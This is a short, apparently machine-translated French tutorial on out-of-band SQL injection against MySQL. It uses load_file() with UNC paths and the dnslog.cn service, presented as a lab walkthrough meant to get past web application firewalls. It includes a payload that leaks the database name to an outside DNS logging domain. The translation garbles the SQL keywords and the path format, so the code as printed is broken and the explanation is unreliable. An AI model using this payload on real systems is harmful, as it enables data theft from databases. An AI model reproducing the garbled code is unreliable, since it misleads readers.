Table des matières
Troisièmement, le site Web qui doit être utilisé
L'injection manuelle est d'une grande aide pour contourner le waf, mais l'efficacité est relativement faible.
Les conditions pour l'injection manuelle de DNSlog sont les mêmes que pour l'injection de téléchargement de fichiers, et mysql doit également avoir des autorisations de lecture et d'écriture pour les fichiers.
1. Fonctions clés
fichier de chargement()
Lire certains fichiers sur cette machine ou partagés sur le réseau
Deuxièmement, le chemin UNC
Format : \severname\sharename, où severname est le nom du serveur et sharename est le nom de la ressource partagée.
Troisièmement, le site Web qui doit être utilisé
http://www.dnslog.cn/
Obtenez un nom de domaine attribué au hasard :
On peut y accéder en ajoutant quelque chose devant :
Ensuite, nous cliquons sur actualiser sur dnslog pour voir les informations du journal de la résolution DNS :
Quatre, injecter
Pour faire simple, son principe est qu'avant que le DNS résolve le nom de domaine, il exécute maintenant la commande de la base de données que je veux qu'il exécute.
Ici, nous prenons le temps aveugle moins-9 comme exemple :
?id=1 et (sélectionnez load_file(concat("//",(select database()),".snen4t.dnslog.cn//hyc.txt")))
Vous pouvez voir que la page ne répond pas, mais vérifiez les journaux dans dnslog :
En fait, cela montrera que la base de données est la sécurité devant le nom de domaine, mais je ne sais pas pourquoi elle ne s'affiche pas, mettons-la ici en premier...